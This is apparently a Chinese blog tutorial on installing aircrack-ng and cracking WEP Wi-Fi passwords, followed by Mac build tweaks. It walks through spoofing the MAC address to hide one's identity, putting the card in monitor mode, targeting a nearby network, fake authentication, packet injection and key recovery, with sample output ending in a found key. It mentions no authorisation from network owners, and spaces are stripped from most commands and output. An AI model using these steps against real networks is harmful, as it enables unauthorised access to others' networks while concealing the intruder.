mac os 安装aircrack

下载代码:http://www.aircrack-ng.org 

修改common.mak文件

找到 CC=$(TOOL_PREFIX)gcc

改成CC=$(TOOL_PREFIX)gcc-4.0

找到CFLAS ?= -g -W ...

在后面添加 -Wno-strict-aliasing -arch i386 -isysroot /Developer/SDKs/MacOSX10.7.sdk

背景&前提

1.本文所阐述的破解技术是基于WEP格式的加密无线网络。

2.本文假定你使用的是UbuntuLinux操作系统,Windows平台下所用方法与本文类似。

3.本文假定你有一个可以接收无线信号的网卡,同时该网卡支持监听(monitor)模式。

4.本文假定你的网卡可以接收到无线信号,即在你的周围有无线信号。

准备工作

在正式进入破解之前,还是需要做一些准备工作的。

1.安装aircrack-ng无线破解软件

1.打开终端(Applications->Accessories->Terminal)。

2.输入命令:

sudoapt-getinstallaircrack-ng

3.这时aircrack-ng会自动下载并安装。

4.(完成后可在终端中输入以下命令

sudoaircrack-ng--help

来测试是否安装成功)。

5.其实,下载的aircrack-ng不仅仅是“一个”程序,而是一个套件。本文中,我们将会用到其中的:

airmon-ng

airodump-ng

aireplay-ng

aircrack-ng

2.获取本机无线网卡信息

首先我们应该知道我们的无线网卡在系统中叫什么名字(也就是标识)。

1.输入命令:

sudoifconfig

2.在输出的内容中,我们应该可以看到类似于”wlan0″的标识,如下图所示。

3.wlan0Linkencap:EthernetHWaddr00:22:fa:88:50:4e

4.inet6addr:fe80::20da:a7ff:fe90:a6f5/64Scopeink

5.UPBROADCASTMULTICASTMTU:1500Metric:1

6.RXpackets:1961errors:0dropped:0overruns:0frame:0

7.TXpackets:2123errors:0dropped:0overruns:0carrier:0

8.collisions:0txqueuelen:1000

RXbytes:1838600(1.8MB)TXbytes:473232(473.2KB)

(后文中,wlan0就表示我们要操纵的无线网卡)

9.输出内容HWaddr后便是无线网卡(wlan0)的MAC地址00:22:fa:88:50:4e

3.修改无线网卡地址(推荐)

如果你不想被别人知道你的真实身份的话,建议你修改自己的无线网卡地址(MAC地址)。

在此我们使用macchanger这个程序来修改自己的网卡地址。

1.安装macchanger:

sudoapt-getinstallmacchanger

2.在修改之前,需要把网卡停止:

sudoifconfigwlan0down

3.将自己的网卡地址修改成随机地址:

sudomacchanger-rwlan0

命令中的-r表示将网卡wlan0的网卡地址修改为任意值,我们此时修改为:22:da:a7:90:a6:f5。

CurrentMAC:00:22:fa:88:50:4e(unknown)

FakedMAC:22:da:a7:90:a6:f5(unknown)

4.重新启用无线网卡:

sudoifconfigwlan0up

开始破解

准备工作完成后,便可进入破解工作。

1.将网卡调整到监听模式

在正常状态下,无线网卡是无法侦测到附近电脑与无线接入点之间的通信的。所以为了获取它们之间的通信数据,我们需要开启无线网卡的监听模式。

1.在修改之前通过命令:

iwconfig

来查看现在的网卡信息,并通过如下命令:

sudoairmon-ngstartwlan0

来开启无线网卡wlan0的监听模式。

2.(开启之后的监听网卡名字默认为mon0,可通过命令:

iwconfig

来查看网卡信息,我们会发现现在系统多出一个网卡mon0,状态为:Monitor态)

mon0IEEE802.11bgMode:MonitorFrequency:2.432GHzTx-Power=20dBm

Retrylonglimit:7RTSthrffFragmentthrff

PowerManagementff

2.查看附近无线网络

现在我们就可以查看附近有哪些无线网络了。

1.通过命令:

sudoairodump-ngmon0

来查看无线网络,结果如下所示(经过处理):

CH5][Elapsed:12s][20XX-XX-0210:29

BSSIDPWRBeacons#Data,#/sCHMBENCCIPHERAUTHESSID

00:23:CD:5A:94:12-477520654.WEPWEPzhy

00:25:86:XX:XX:XX-587060654.WEPWEP317

C8:3A:35:XX:XX:XX-752300654eWPA2CCMPPSK415

00:23:CD:XX:XX:XX-752100354.WEPWEP314

00:27:19:XX:XX:XX-732800654.WPA2CCMPPSKTP-LINK_78CFD4

BSSIDSTATIONPWRRateLostPacketsProbes

(notassociated)00:253:XX:XX:XX-700-14236

(notassociated)00:1C:BF:XX:XX:XX-700-113

(notassociated)00:253:XX:XX:XX-560-11472

(notassociated)00:26:82:XX:XX:XX-760-1215FAST

00:23:CD:5A:94:1200:13:02:XX:XX:XX-7648-5402

2.当周围环境中的无线网络接入点基本显示完全后,Ctrl+C结束当前程序。但是不要关闭当前窗口,因为我们还要利用这些数据,为方便下次使用你也可以复制这些数据到文本中。

3.获取指定无线接入点数据包

比如我们要破解上面的一个BSSID为:00:23:CD:5A:94:12的接入点(ESSID为:zhy),我们就需要获取它相应的数据包。

1.打开一个新的终端,并输入命令:

sudoairodump-ngmon0-wmeiyou--bssid00:23:CD:5A:94:12-c6

其中,参数-w指明数据保存文件(meiyou),参数–bssid指明要截取数据包的接入点MAC地址,参数-c指明获取的频道为6。

2.(当前程序不要中止,再打开一个新的终端,进行下一步)

4.对无线接入点进行注入(推荐)

如果你感觉上面数据包截取的数据(#Data项)速度太慢,那么你最好对该接入点进行注入。(注:有时,该方法对某些类型的接入点不太好用)

1.和该接入点进行关联

1.在刚才打开的新终端下,输入命令:

sudoaireplay-ng-10-a00:23:CD:5A:94:12-h22:da:a7:90:a6:f5mon0

其中,参数-1指明这是虚拟认证(Fakeauthentication),参数0含义不明(官方解释为:0reassociationtiminginseconds),参数-a指明接入点MAC地址,参数-h指明本机MAC地址,mon0为本机网卡名称。

2.如果返回结果如下所示,就说明你已经和该接入点关联起来了:

3.09:50:52Waitingforbeaconframe(BSSID:00:23:CD:5A:94:12)onchannel6

4.

5.09:50:52SendingAuthenticationRequest(OpenSystem)[ACK]

6.09:50:52Authenticationsuccessful

7.09:50:52SendingAssociationRequest[ACK]

09:50:52Associationsuccessful:-)(AID:1)

2.对该接入点进行注入

1.通过命令:

sudoaireplay-ng-2-F-p0841-cff:ff:ff:ff:ff:ff-b00:23:CD:5A:94:12-h22:da:a7:90:a6:f5mon0

其中,参数-2指明这是Interactivepacketreplay方式,参数-F指明使用第一个匹配的数据包,参数-p指明数据帧的控制字符,参数-c指明目的MAC地址,参数-b指明接入点MAC地址,参数-h指明源地址MAC地址,mon0为本机网卡名称。

2.如果返回结果如下所示,那么这时,上一个正在截获数据的终端的#Data项数值应该会疯涨,表明注入成功。

3.Savingchosenpacketinreplay_src-0502-095620.cap

4.Youshouldalsostartairodump-ngtocapturereplies.

5.

Sent3152packets...(499pps)

6.(当前程序不要中止,因为我们需要一直进行注入,直到下一步的破解成功为止)

5.破解WEP密码

现在,airodump-ng命令正在截获指定接入点的通信数据,aireplay-ng命令正在对指定接入点进行注入,以增加数据量。那么现在,我们就可以通过另一个命令来处理这些正在截获的数据,以求破解其中的WEP密码。

1.打开一个新的终端,输入命令:

lsmeiyou*

列出了刚才保存的数据文件(meiyou-01.cap),如果你多次截取的话,应该会有多个cap文件。

2.通过如下命令,加载数据截取文件,破解WEP密码:

sudoaircrack-ngmeiyou-01.cap

如果你需要加载多个文件,同时进行破解,输入如下命令:

sudoaircrack-ngmeiyou-*.cap

3.现在aircrack-ng程序正在对数据截取文件进行破解,企图找到WEP密码,如果没有找到密码,aircrack-ng程序会等到另一终端截(airodump-ng)取到5000个数据后,重新进行破解。

4.(现在你应该开着3个终端,一个正在截取接入点数据,一个正在对接入点进行注入,还有一个正在对所截取的文件进行WEP密码破解。如果最后一个终端显示出密码话,进入下一步收尾工作)

5.如果一切顺利,密码会自动显示出来:

6.Aircrack-ng1.1

7.

8.[00:01:41]Tested87keys(got25012IVs)

9.

10.KBdepthbyte(vote)

11.00/162(37120)11(33536)4C(33536)70(33536)87(33024)

12.10/161(39168)27(35072)AF(34304)CC(34048)83(33792)

13.23/51F(33792)2C(33280)3E(33280)82(33024)9F(33024)

14.30/364(34816)58(34048)B5(34048)6A(33280)7C(33280)

15.41/775(34304)50(33792)F1(33792)10(33536)23(33536)

16.

17.KEYFOUND![31:32:33:34:35](ASCII:12345)

Decryptedcorrectly:100%

6.收尾工作

1.终止aireplay-ng程序对无线接入点的注入(Ctrl+Z终止程序)

2.终止airodump-ng程序对数据的截获(Ctrl+C终止程序)

3.        至此,完成对指定接入点的WEP密码破解。

http://rhodzy.com/easily-install-aircrack-mac-os-x

http://blog.nightlionsecurity.com/hacking/2012/03/guide-to-install-aircrack-ng-on-mac-osx-10-7-lion/

相关推荐